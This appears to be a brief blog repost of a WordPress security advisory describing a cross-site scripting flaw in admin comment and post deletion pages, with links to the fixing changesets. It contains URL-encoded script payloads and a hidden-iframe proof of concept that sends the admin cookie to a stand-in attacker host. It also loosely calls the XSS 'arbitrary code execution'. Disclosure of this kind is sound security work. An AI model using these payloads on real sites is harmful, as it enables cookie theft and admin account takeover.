LuisCosio.com

A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.

Here are some examples of arbitrary code execution:

http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Here is a proof-of-concept code to steal the admin cookies:

 <iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"></iframe>

Solution:

http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
Original advisory at seclists.org